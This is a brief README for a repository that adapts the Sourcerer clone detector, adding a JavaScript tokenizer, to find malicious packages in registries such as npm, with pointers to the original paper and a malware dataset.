The code for Sourcerer comes from this GitHub repo.
This repo provides code that lightly modifies Sourcerer in two ways:
- It includes a tokenizer for JavaScript files
- Instead of detecting clones, it's used to detect malware signatures
The use case is to find malicious packages in open-source package registries like npm.
For details of Sourcerer, see the ICSE 2016 paper. For malware samples, have a look at the Backstabber's Knife dataset.